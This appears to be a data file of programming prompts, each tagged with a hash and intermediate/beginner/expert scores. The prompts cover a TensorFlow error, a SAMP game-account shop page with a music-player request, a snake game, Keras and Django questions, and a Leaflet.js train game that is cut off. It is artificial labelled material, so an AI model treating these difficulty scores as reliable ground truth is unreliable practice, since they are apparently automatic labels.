1., 0., 1., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 0., 1., 1.,
1., 1., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 0.27275827, 1.9034191 ,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.84100617, 5.18553758, 3.36605891, 2.55102041,
5.52668871, 4.19776119, 3.37806571, 2.11591536, 9.26713948,
10.24321796, 6.26690712, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.20901995, 0.21477663, 9.41662839,
9.15269597, 7.17682663, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.48557479, 0.69747167, 1.27137221,
3.44827586, 7.39762219, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.32136445, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -2.05456383, -4.78061559, -2.93522267,
-4.8048048 , -4.39008043, -4.09215956, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -0.56100982,
-0.66041015, -6.63282572, -7.94520548, -7.70024063,
-3.6252692 , -1.25045973, -12.66453219, -11.6588701 ,
-13.34289813, -5.81304006, -8.6824067 , -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -1.7826087 ,
-6.76846884, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.73497622, -3.61041142,
-4.33694746, -8.72564935, -7.995029 , -5.04489098,
-1.42032845, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -6.20377979,
-4.01691332, -6.00083928, -2.69331017, -6.54560811,
-3.15098468, -2.78022948, -2.26264419, -5.59440559,
-3.45601436, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 0.,
0., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 1., 1., 0., 0., 1., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 1., 0., 0., 0., 0., 0., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 0., 1., 1., 1.,
1., 0., 0., 0.]), array([ 5.88235294, 4.27753452, 0.06548788, 2.0242915 , -0.1001001 ,
0.30160858, 2.57909216, 3.14661134, 2.21616093, 5.67500881,
5.52622316, 5.11921459, 4.2057699 , 0.94754653, 1.02739726,
0.44688897, 1.54343144, 4.045605 , 0.60476699, 1.76322418,
-0.03586801, 4.12411626, 0.07616146, 2.29696473, 1.54723127,
0. , 4.93592786, 5.18553758, 4.44132772, 3.61781076,
5.52668871, 4.19776119, 6.94123091, 8.41766329, 11.44208038,
23.52666043, 19.07123535, 15.98594642, 18.96396396, 14.82608696,
3.75567478, 0.29154519, 3.29575022, 3.47938144, 13.87230133,
15.67739012, 10.37613489, 7.17884131, 6.46371977, 3.61201299,
1.90555095, 3.76229158, 2.52996005, 0.69747167, 6.9267865 ,
14.10658307, 12.19726993, 12.19726993, 11.75438596, 4.68364832,
2.41014799, 0.58749475, 4.12684622, 1.22466216, 3.45733042,
4.32480141, 4.88021295, 1.13636364, 3.36624776, 1.67770419,
5.88505747, 6.37413395]), array([ -1.19699042, -3.09868643, -6.58153242, -3.74493927,
-6.94027361, -7.77479893, -5.36451169, -4.84094053,
-6.17115581, -2.99612266, -0.80957409, -3.26086957,
-6.56934307, -9.13705584, -8.04794521, -7.70024063,
-11.88083274, -9.709452 , -14.05193881, -13.70996761,
-13.98852224, -25.17674784, -27.45620716, -21.86218212,
-22.43485342, -22.43485342, -3.27479829, -3.04471931,
-3.88031791, -4.63821892, -2.50354275, -2.51865672,
-2.91531698, -3.49586017, -0.80378251, -1.87090739,
-3.69702435, -4.12823891, -1.66666667, -8.56521739,
-13.20676847, -12.41149521, -8.80312229, -9.66494845,
-2.61828204, -3.94200272, -0.82144401, -5.58354324,
-7.38115096, -9.86201299, -7.995029 , -7.6528431 ,
-4.12782956, -5.8413252 , -5.30469093, -3.26914465,
-1.58520476, -1.58520476, -1.27192982, -7.97041906,
-5.28541226, -7.13386488, -3.8662033 , -6.96790541,
-3.58862144, -4.67784643, -4.56965395, -6.90559441,
-4.39856373, -5.9602649 , -2.06896552, -1.61662818]), array([0., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 0., 0., 0., 0., 0., 0., 0., 0.,
0., 0., 0., 0., 0., 1., 1., 1., 0., 0., 0., 0., 1., 1., 1., 1., 1.,
1., 0., 0., 0., 0., 0., 0., 0., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
0., 0., 0., 0.])]).
\t [[{{node PyFunc}}]]
\t [[IteratorGetNext]] [Op:__inference_one_step_on_iterator_7596]"
}
|
a6e471421603bc5cf63a1e188762f533
|
{
"intermediate": 0.4520384967327118,
"beginner": 0.3773055672645569,
"expert": 0.1706559956073761
}
|
46,742
|
<!DOCTYPE html><html lang="ru"><head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="title" content="MODER SHOP - площадка по продаже и покупке аккаунтов SAMP">
<meta name="Keywords" content="Магазин аккаунтов SAMP, купить вирты самп, купить аккаунт SAMP, продать аккаунт SAMP, SAMP">
<meta name="description" content="На нашей площадке вы можете купить аккаунт SAMP, либо же продать свой аккаунт в САМП. Это полностью бесплатно, удобно и безопасно, ведь перед продажей аккаунта его проверяют наши боты, а так же в течение 12 часов вы сможете вернуть деньги.">
<title>MODER SHOP - площадка по продаже модов и разработок</title>
<link rel="shortcut icon" href="images/favicon.png" type="image/x-icon">
<link rel="stylesheet" href="css/libs-beta.css">
<link rel="stylesheet" href="css/main-beta.css">
</head>
<body>
<!-- Header Navbar (start) -->
<!--LiveInternet counter--><script type="25e3660b161ee406eb08dbd9-text/javascript">
new Image().src = "//counter.yadro.ru/hit?r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+
";"+Math.random();</script><!--/LiveInternet-->
<nav class="header__navbar garland0 inner__navbar navbar navbar-toggleable-md ">
<div class="container">
<button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
<i class="fas fa-bars"></i>
</button>
<div class="header__navbar__logo"><a href="/"><img src="images/logo.png" alt=""></a></div>
<div class="collapse navbar-collapse" id="navbarSupportedContent">
<ul class="header__navbar__menu ml-auto">
<li><a href="/catalog/">Товары</a></li>
<li><a href="/register/">Регистрация</a></li>
<li><a href="/login/">Вход</a></li>
</ul>
</div>
</div>
</nav>
<!-- Header Navbar (end) -->
<!-- Description (start) -->
<section class="index__description">
<div class="container">
<div class="row wow animated fadeInDown">
<div class="col-12">
<h1>MODER SHOP</h1>
<p>Лидер магазинов в SAMP-индустрии, множество товаров, проверенные продавцы, безопасные сделки и регулярное обновление каталога - все это вы найдете в нашем магазине, не упусти свой шанс.</p>
<a class="button button-1" href="/catalog/">Модификации</a> <a class="button button-1" href="/money/">Готовые решения</a>
<a class="button button-1" href="/buytask/">Заказать</a>
</div>
</div>
<div class="index__macbook wow animated fadeInUp"><img class="img-fluid" src="images/macbook.png" alt=""></div>
</div>
</section>
<!-- Description (end) -->
<!-- Advantages (start) -->
<section class="index__advantages">
<div class="container">
<div class="section__title"><h2>Почему нам стоит доверять?</h2></div>
<div class="index__advantages__items">
<div class="row">
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.2s">
<div class="icon"><div class="bg-adv bg-adv_icon_1"></div></div>
<div class="text">
<h3>Это бесплатно</h3>
<p>� егистрация и размещение аккаунтов абсолютно бесплатные, мы лишь взымаем небольшой процент с ваших продаж.</p>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.4s">
<div class="icon"><div class="bg-adv bg-adv_icon_2"></div></div>
<div class="text">
<h3>Безопасность</h3>
<p>После покупки аккаунт проверяется нашим ботом и в случае ошибки деньги будут возвращены вам.</p>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.6s">
<div class="icon"><div class="bg-adv bg-adv_icon_3"></div></div>
<div class="text">
<h3>Отзывчивая поддержка</h3>
<p>Наши менеджеры работают 24/7 без выходных и всегда готовы ответить на ваши вопросы и помочь с решением возникших проблем.</p>
</div>
</div>
</div>
</div>
<div class="row">
<div class="col-lg-4 offset-lg-2">
<div class="adv__item wow animated fadeInUp" data-wow-delay="0.8s">
<div class="icon"><div class="bg-adv bg-adv_icon_4"></div></div>
<div class="text">
<h3>Большой спрос</h3>
<p>Мы вкладываем огромные силы и вложения в продвижения нашего магазина, чтобы обойти всех конкурентов и доказать, что мы лучшие.</p>
</div>
</div>
</div>
<div class="col-lg-4">
<div class="adv__item wow animated fadeInUp" data-wow-delay="1s">
<div class="icon"><div class="bg-adv bg-adv_icon_5"></div></div>
<div class="text">
<h3>Бесплатный софт</h3>
<p>Продавая аккаунты у нас, вы получите бесплатный чекер, и вам не придется платить за него.</p>
</div>
</div>
</div>
</div>
</div>
<center><a class="button button-1 wow animated zoomIn" href="/register/">Зарегистрироваться</a></center>
</div>
</section>
<!-- Advantages (end) -->
<!-- Footer (start) -->
<footer class="footer wow animated fadeInUp">
<div class="container">
<div class="row d-flex justify-content-between">
<div class="footer__info">
<div class="footer__info__logo"><a href="">SAMP Store</a></div>
<div class="footer__info__copy">
<span class="rights">All rights reserved © 2018-2023<br></span>
<span class="dev">Контакты поддержки:<br> <a target="_blank" href="https://vk.com/berkut_tnt">vk.com</a> | <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="7312171e1a1d3300121e035e00071c01165d0106">[email� protected]</a></span>
<a href="https://www.free-kassa.ru/"><img src="images/18.png"></a>
</div>
</div>
<ul class="footer__menu">
<li><a href="/catalog/">Модификации</a></li>
<li><a href="/money/">Разработки</a></li>
<li><a href="/register/">Зарегистрироваться</a></li>
<li><a href="/login/">Войти</a></li>
</ul>
</div>
</div>
</footer>
<!-- Footer (end) -->
<!-- Load styles and scripts -->
<script data-cfasync="false" src="js/email-decode.min.js"></script><script src="js/scripts.min.js" type="25e3660b161ee406eb08dbd9-text/javascript"></script>
<script src="js/wow.min.js" type="25e3660b161ee406eb08dbd9-text/javascript"></script>
<script src="js/main.js" type="25e3660b161ee406eb08dbd9-text/javascript"></script>
<script type="25e3660b161ee406eb08dbd9-text/javascript">new WOW().init();</script>
<script src="js/rocket-loader.min.js" data-cf-settings="25e3660b161ee406eb08dbd9-|49" defer=""></script>
</body></html>
Добавь в этот код музыкальный плеер, который не будет выключаться при переходе на другие страницы сайта
|
772ede8581323da9f0ca7ded9416e142
|
{
"intermediate": 0.4479261636734009,
"beginner": 0.43304046988487244,
"expert": 0.11903330683708191
}
|
46,743
|
Write a game about snake
|
a89655b857590106e3bfb2959f277c7f
|
{
"intermediate": 0.34226417541503906,
"beginner": 0.4051211476325989,
"expert": 0.25261467695236206
}
|
46,744
|
code:
# %%
import os
import numpy as np
import pandas as pd
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from tensorflow.keras.layers import Input, Dropout
from tensorflow.keras import Model
# %%
def data_generator(file_paths, batch_size, train=True, scaler=None):
while True: # Loop forever so the generator never terminates
# Shuffle file paths to ensure random distribution of data across files
np.random.shuffle(file_paths)
for file_path in file_paths:
data = pd.read_csv(file_path)
# Split features and labels
X = data.drop([
'Date', 'Symbol',
'y_High_1d', 'y_Low_1d', 'y_Priority_1d',
'y_High_2d', 'y_Low_2d', 'y_Priority_2d',
'y_High_3d', 'y_Low_3d', 'y_Priority_3d',
'y_High_5d', 'y_Low_5d', 'y_Priority_5d'], axis=1).values
y_high_1d = data['y_High_1d'].values
y_low_1d = data['y_Low_1d'].values
y_priority_1d = data['y_Priority_1d'].values
y_high_2d = data['y_High_2d'].values
y_low_2d = data['y_Low_2d'].values
y_priority_2d = data['y_Priority_2d'].values
y_high_3d = data['y_High_3d'].values
y_low_3d = data['y_Low_3d'].values
y_priority_3d = data['y_Priority_3d'].values
y_high_5d = data['y_High_5d'].values
y_low_5d = data['y_Low_5d'].values
y_priority_5d = data['y_Priority_5d'].values
# Optionally, apply preprocessing here (e.g., Scaler transform)
if scaler is not None and train:
X = scaler.fit_transform(X)
elif scaler is not None:
X = scaler.transform(X)
# Splitting data into batches
for i in range(0, len(data), batch_size):
end = i + batch_size
X_batch = X[i:end]
y_high_batch_1d = y_high_1d[i:end]
y_low_batch_1d = y_low_1d[i:end]
y_priority_batch_1d = y_priority_1d[i:end]
y_high_batch_2d = y_high_2d[i:end]
y_low_batch_2d = y_low_2d[i:end]
y_priority_batch_2d = y_priority_2d[i:end]
y_high_batch_3d = y_high_3d[i:end]
y_low_batch_3d = y_low_3d[i:end]
y_priority_batch_3d = y_priority_3d[i:end]
y_high_batch_5d = y_high_5d[i:end]
y_low_batch_5d = y_low_5d[i:end]
y_priority_batch_5d = y_priority_5d[i:end]
yield X_batch, (y_high_batch_1d, y_low_batch_1d,y_priority_batch_1d,
y_high_batch_2d, y_low_batch_2d,y_priority_batch_2d,
y_high_batch_3d, y_low_batch_3d, y_priority_batch_3d,
y_high_batch_5d, y_low_batch_5d, y_priority_batch_5d)
# %%
dataset_dir = r'C:\Users\arisa\Desktop\day_spot'
file_paths = [os.path.join(dataset_dir, file_name) for file_name in os.listdir(dataset_dir)]
train_files, val_files = train_test_split(file_paths, test_size=0.06, random_state=42)
batch_size = 72
# %%
# Optional: Initialize a scaler for data normalization
scaler = StandardScaler()
# %%
# Create data generators
train_gen = data_generator(train_files, batch_size, train=True, scaler=scaler)
val_gen = data_generator(val_files, batch_size, train=False, scaler=scaler)
# %%
input_shape = (72, 6427)
inputs = Input(shape=input_shape) # Corrected the input shape specification
x = Dense(6427, activation='relu')(inputs)
x = Dropout(0.25) (x)
x = Dense(3200, activation='relu') (x)
x = Dropout(0.20) (x)
x = Dense(1800, activation='relu') (x)
x = Dropout(0.15) (x)
x = Dense(1024, activation='relu') (x)
x = Dropout(0.10) (x)
x = Dense(512, activation='relu') (x)
x = Dropout(0.05) (x)
x = Dense(256, activation='relu') (x)
x = Dense(128, activation='relu') (x)
x = Dense(64, activation='relu') (x)
x = Dense(32, activation='relu') (x)
# Defining three separate outputs
out_high_1d = Dense(1, name='high_output_1d')(x) # No activation, linear output
out_low_1d = Dense(1, name='low_output_1d')(x) # No activation, linear output
out_priority_1d = Dense(1, activation='sigmoid', name='priority_output_1d')(x)
out_high_2d = Dense(1, name='high_output_2d')(x) # No activation, linear output
out_low_2d = Dense(1, name='low_output_2d')(x) # No activation, linear output
out_priority_2d = Dense(1, activation='sigmoid', name='priority_output_2d')(x)
out_high_3d = Dense(1, name='high_output_3d')(x) # No activation, linear output
out_low_3d = Dense(1, name='low_output_3d')(x) # No activation, linear output
out_priority_3d = Dense(1, activation='sigmoid', name='priority_output_3d')(x)
out_high_5d = Dense(1, name='high_output_5d')(x) # No activation, linear output
out_low_5d = Dense(1, name='low_output_5d')(x) # No activation, linear output
out_priority_5d = Dense(1, activation='sigmoid', name='priority_output_5d')(x)
# Constructing the model
model = Model(inputs=inputs, outputs=[
out_high_1d, out_low_1d, out_priority_1d,out_high_2d, out_low_2d, out_priority_2d,
out_high_3d, out_low_3d, out_priority_3d,out_high_5d, out_low_5d, out_priority_5d])
model.compile(optimizer='adam',
loss={
'high_output_1d': 'mse', 'low_output_1d': 'mse', 'priority_output_1d': 'binary_crossentropy',
'high_output_2d': 'mse', 'low_output_2d': 'mse', 'priority_output_2d': 'binary_crossentropy',
'high_output_3d': 'mse', 'low_output_3d': 'mse', 'priority_output_3d': 'binary_crossentropy',
'high_output_5d': 'mse', 'low_output_5d': 'mse', 'priority_output_5d': 'binary_crossentropy'
},
metrics={
'high_output_1d': ['mae'], 'low_output_1d': ['mae'], 'priority_output_1d': ['accuracy'],
'high_output_2d': ['mae'], 'low_output_2d': ['mae'], 'priority_output_2d': ['accuracy'],
'high_output_3d': ['mae'], 'low_output_3d': ['mae'], 'priority_output_3d': ['accuracy'],
'high_output_5d': ['mae'], 'low_output_5d': ['mae'], 'priority_output_5d': ['accuracy']
},
loss_weights={
'high_output_1d': 1.0, 'low_output_1d': 1.0, 'priority_output_1d': 1.0,
'high_output_2d': 1.0, 'low_output_2d': 1.0, 'priority_output_2d': 1.0,
'high_output_3d': 1.0, 'low_output_3d': 1.0, 'priority_output_3d': 1.0,
'high_output_5d': 1.0, 'low_output_5d': 1.0, 'priority_output_5d': 1.0
}
)
# %%
import os
import pandas as pd
def count_samples(file_paths):
total_samples = 0
for file_path in file_paths:
df = pd.read_csv(file_path)
samples = len(df)
total_samples += samples
return total_samples
number_of_training_samples = count_samples(train_files)
number_of_validation_samples = count_samples(val_files)
print(f'Number of training samples: {number_of_training_samples}')
print(f'Number of validation samples: {number_of_validation_samples}')
# %%
import tensorflow as tf
output_signature = (
tf.TensorSpec(shape=(72, X_batch.shape[1]), dtype=tf.float32), # for X_batch
(
tf.TensorSpec(shape=(72,), dtype=tf.float32), # For each y_batch
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
tf.TensorSpec(shape=(72,), dtype=tf.float32),
)
)
train_dataset = tf.data.Dataset.from_generator(
lambda: train_gen,
output_signature=output_signature
)
val_dataset = tf.data.Dataset.from_generator(
lambda: val_gen,
output_signature=output_signature
)
# %%
# You'll need to determine steps_per_epoch and validation_steps based on your data size and batch size
steps_per_epoch = np.ceil(number_of_training_samples / batch_size).astype(int) # Replace number_of_training_samples
validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
# model.fit(train_gen,
# steps_per_epoch=steps_per_epoch,
# validation_data=val_gen,
# validation_steps=validation_steps,
# epochs=1000)
# Then use these datasets in your model.fit call
model.fit(train_dataset,
steps_per_epoch=steps_per_epoch,
validation_data=val_dataset,
validation_steps=validation_steps,
epochs=1000)
error:
{
"name": "AttributeError",
"message": "'NoneType' object has no attribute 'items'",
"stack": "---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
Cell In[46], line 12
3 validation_steps = np.ceil(number_of_validation_samples / batch_size).astype(int) # Replace number_of_validation_samples
5 # model.fit(train_gen,
6 # steps_per_epoch=steps_per_epoch,
7 # validation_data=val_gen,
(...)
10
11 # Then use these datasets in your model.fit call
---> 12 model.fit(train_dataset,
13 steps_per_epoch=steps_per_epoch,
14 validation_data=val_dataset,
15 validation_steps=validation_steps,
16 epochs=1000)
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\utils\\traceback_utils.py:122, in filter_traceback.<locals>.error_handler(*args, **kwargs)
119 filtered_tb = _process_traceback_frames(e.__traceback__)
120 # To get the full stack trace, call:
121 # `keras.config.disable_traceback_filtering()`
--> 122 raise e.with_traceback(filtered_tb) from None
123 finally:
124 del filtered_tb
File c:\\Users\\arisa\\AppData\\Local\\Programs\\Python\\Python310\\lib\\site-packages\\keras\\src\\trainers\\trainer.py:898, in Trainer._pythonify_logs(self, logs)
896 def _pythonify_logs(self, logs):
897 result = {}
--> 898 for key, value in sorted(logs.items()):
899 if isinstance(value, dict):
900 result.update(self._pythonify_logs(value))
AttributeError: 'NoneType' object has no attribute 'items'"
}
|
7d6a7d64f3b8036c1939ffa26f8ceb56
|
{
"intermediate": 0.4991265833377838,
"beginner": 0.354446679353714,
"expert": 0.1464267522096634
}
|
46,745
|
my django project has 2 apps named common and user respectively. I placed an abstract model in common apps. and want to inherit the model from common app to make new model, how import the common model correctly?
|
56782bfd84c2525552cf2609dd908072
|
{
"intermediate": 0.6392097473144531,
"beginner": 0.15490299463272095,
"expert": 0.2058873325586319
}
|
46,746
|
in a django project, 2 apps created named common and user respectively, abstract model placed in common, how to extend the abstract model in user app
|
18ff7772ede3b43a0fd1c37df9c1e3c3
|
{
"intermediate": 0.4307248294353485,
"beginner": 0.22524148225784302,
"expert": 0.34403371810913086
}
|
46,747
|
In javascript for leaflet.js I want to add a green circle marker to firstCityCoords and secondCityCoords when a cafe and a hotel has been added to both stations. However my if statement 'if (cafeOneBonus > 0 && cafeTwoBonus > 0 && hotelOneBonus > 0 && hotelTwoBonus > 0)' is failing to detect when they have all been added - 'var money = 100000;
var numberOfCarriages = 1;
var speed = 60;
var dailybonus = 0;
var selectedMarker = null; // Variable to store the selected marker
const map = L.map("map").setView([54.2231637, -1.9381623], 6);
// Add custom zoom control to the map with position set to ‘topright’
const customZoomControl = L.control.zoom({ position: "topright" }).addTo(map);
// Remove the default zoom control from the map
map.removeControl(map.zoomControl);
let clickedPoints = [];
let isLineDrawn = false;
let marker; // Declare the marker variable
let progress = 0;
let cafeOneBonus = 0;
let cafeTwoBonus = 0;
let hotelOneBonus = 0;
let hotelTwoBonus = 0;
let buildingRadius = 0;
let buildingRadius2 = 0;
// Function to create circle markers with click functionality
function createCircleMarkers(geojson) {
return L.geoJSON(geojson, {
pointToLayer: function (feature, latlng) {
const circleMarker = L.circleMarker(latlng, {
radius: 4,
fillColor: "#ff7800",
color: "#000",
weight: 0.2,
opacity: 1,
fillOpacity: 0.8,
});
// Attach the feature to the circle marker
circleMarker.feature = feature;
circleMarker.on("mouseover", function () {
this.bindPopup(feature.properties.city).openPopup();
});
circleMarker.on("click", function (e) {
if (!isLineDrawn && selectedMarker !== e.target) {
clickedPoints.push(e.target); // Push the circle marker with attached feature
if (clickedPoints.length === 2) {
const firstCityCoords =
clickedPoints[0].feature.geometry.coordinates;
const secondCityCoords =
clickedPoints[1].feature.geometry.coordinates;
const polyline = L.polyline(
clickedPoints.map((p) => p.getLatLng())
).addTo(map);
const firstCity = clickedPoints[0].feature.properties.city;
const secondCity = clickedPoints[1].feature.properties.city;
clickedPoints = [];
isLineDrawn = true;
// Remove click event listener after a line has been drawn
map.off("click");
// Set the map bounds to show the area with the polyline
map.fitBounds(polyline.getBounds());
money = money - 50000; // Subtract 50000 from money
const moneyDisplay = document.getElementById("moneydisplay");
const moneyString = `£${money}`; // Assuming money is a number
moneyDisplay.textContent = moneyString;
const instructionsElement = document.getElementById("instructions");
// Clear any existing content in the instructions element:
instructionsElement.innerHTML = "";
// Create separate paragraph elements:
const congratulationsParagraph = document.createElement("p");
congratulationsParagraph.textContent = `Congratulations you have built your first train line from ${firstCity} to ${secondCity}!`;
const costsParagraph = document.createElement("p");
costsParagraph.textContent = `Your construction costs were £50,000. You have £50,000 remaining.`;
const buyTrainParagraph = document.createElement("p");
buyTrainParagraph.textContent = "You now need to buy a train.";
const newTrainParagraph = document.createElement("p");
newTrainParagraph.textContent =
"At this time you can only afford to buy the train engine the Sleeping Lion. The Sleeping Lion has a traveling speed of 60 miles per hour. It can pull four carriages. Which means your train will have a capacity of around 120 seated passengers";
const traincost = document.createElement("p");
traincost.textContent = `The Sleeping Lion will cost you £30,000 to purchase. Do you wish to buy the Sleeping Lion?`;
// Append paragraphs to the instructions element:
instructionsElement.appendChild(congratulationsParagraph);
instructionsElement.appendChild(costsParagraph);
instructionsElement.appendChild(buyTrainParagraph);
instructionsElement.appendChild(newTrainParagraph);
instructionsElement.appendChild(traincost);
// Add button element:
const buyButton = document.createElement("button");
buyButton.id = "buybutton";
buyButton.textContent = "Buy Train";
// Append the button element to the instructions element:
instructionsElement.appendChild(buyButton);
//buybutton event listener
document
.getElementById("buybutton")
.addEventListener("click", function () {
// Check if you have enough money before purchase
money = money - 30000; // Subtract 30000 from money
const moneyDisplay = document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Update instructions content after successful purchase
instructionsElement.innerHTML = ""; // Clear previous content
const successMessage = document.createElement("p");
successMessage.textContent = `You now have a train line from ${firstCity} to ${secondCity} and a train! Press the button below to begin operations.`;
instructionsElement.appendChild(successMessage);
// Add button element:
const trainButton = document.createElement("button");
trainButton.id = "trainbutton";
trainButton.textContent = "Start Train";
// Append the button element to the instructions element:
instructionsElement.appendChild(trainButton);
trainButton.addEventListener("click", function () {
console.log("Train Started");
//emptyinstructions add improvement buttons
instructionsElement.innerHTML = ""; // Clear previous content
//randomgeneration of dailybonus
function generateDailyBonus(minBonus, maxBonus) {
const randomNumber =
Math.floor(Math.random() * (maxBonus - minBonus + 1)) +
minBonus;
dailybonus += randomNumber;
console.log(`Daily bonus of ${randomNumber} added!`);
}
//buy carriages
//add carriages button
const carriageButton = document.createElement("button");
carriageButton.id = "trainbutton";
carriageButton.textContent = "Buy Train Carriage";
const carriageMessage = document.createElement("p");
carriageMessage.textContent = `Buy another passenger carriage for your train for £20,000`;
instructionsElement.appendChild(carriageMessage);
// Append the button element to the instructions element:
instructionsElement.appendChild(carriageButton);
//cariagebutton logic
carriageButton.addEventListener("click", () => {
console.log("Carriage Bought");
// Check if enough money is available
if (money >= 20000) {
// Check if maximum number of carriages reached
if (numberOfCarriages < 4) {
numberOfCarriages++;
money -= 20000; // Subtract 20000 from money
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
// Update marker content using the previously retrieved reference
markerContent.textContent = numberOfCarriages;
// Remove button and message if max carriages reached after purchase
if (numberOfCarriages === 4) {
instructionsElement.removeChild(carriageButton);
instructionsElement.removeChild(carriageMessage);
}
} else {
console.log(
"Maximum number of carriages reached! You can't buy more."
);
instructionsElement.removeChild(carriageButton);
instructionsElement.removeChild(carriageMessage);
}
}
});
//buy station cafes
//add station one cafe button
const stationOneMessage = document.createElement("p");
stationOneMessage.textContent = `Open a cafe in ${firstCity} Station for £2,500.`;
instructionsElement.appendChild(stationOneMessage);
// Add button element:
const cafeOneButton = document.createElement("button");
cafeOneButton.id = "trainbutton";
cafeOneButton.textContent = "Buy Cafe";
// Append the button element to the instructions element:
instructionsElement.appendChild(cafeOneButton);
//cafeonelogic
cafeOneButton.addEventListener("click", () => {
if (money >= 2500) {
// add a random number between 2000 and 7000 to dailbonus
generateDailyBonus(2000, 7000); // Call with cafe bonus range
cafeOneBonus = dailybonus;
console.log("Cafe one bought");
money -= 2500;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(cafeOneButton);
instructionsElement.removeChild(stationOneMessage);
//fetch data from Overpass API around first station
buildingRadius += 150;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius},${firstCityCoords[1]},${firstCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
const coordinates = element.nodes.map(
(nodeId) => {
const node = data.elements.find(
(node) => node.id === nodeId
);
return [node.lat, node.lon];
}
);
// Create a polyline for the road
const polyline = L.polyline(coordinates, {
color: "#333333",
weight: 1,
}).addTo(map);
}
});
})
.catch((error) => {
console.error("Error fetching data:", error);
});
} else {
}
});
//add station two cafe buttons
const stationTwoMessage = document.createElement("p");
stationTwoMessage.textContent = `Open a cafe in ${secondCity} Station for £2,500.`;
instructionsElement.appendChild(stationTwoMessage);
// Add button element:
const cafeTwoButton = document.createElement("button");
cafeTwoButton.id = "trainbutton";
cafeTwoButton.textContent = "Buy Cafe";
// Append the button element to the instructions element:
instructionsElement.appendChild(cafeTwoButton);
//cafetwologic
cafeTwoButton.addEventListener("click", () => {
if (money >= 2500) {
// Generate a random number between 2000 (inclusive) and 7000 (exclusive)
generateDailyBonus(2000, 7000); // Call with cafe bonus range
cafeTwoBonus = dailybonus;
console.log("Cafe two bought");
money -= 2500;
const moneyDisplay =
document.getElementById("moneydisplay");
const moneyString = `£${money}`;
moneyDisplay.textContent = moneyString;
instructionsElement.removeChild(cafeTwoButton);
instructionsElement.removeChild(stationTwoMessage);
//fetch data from Overpass API around first station
buildingRadius2 += 150;
const overpassQuery = `
[out:json];
way["building"](around:${buildingRadius2},${secondCityCoords[1]},${secondCityCoords[0]});
out body;
>;
out skel qt;
`;
fetch("https://overpass-api.de/api/interpreter", {
method: "POST",
headers: {
"Content-Type": "application/x-www-form-urlencoded",
},
body: "data=" + encodeURIComponent(overpassQuery),
})
.then((response) => response.json())
.then((data) => {
// Process the data returned by the Overpass API
data.elements.forEach((element) => {
if (element.type === "way") {
// Extract coordinates from the way element
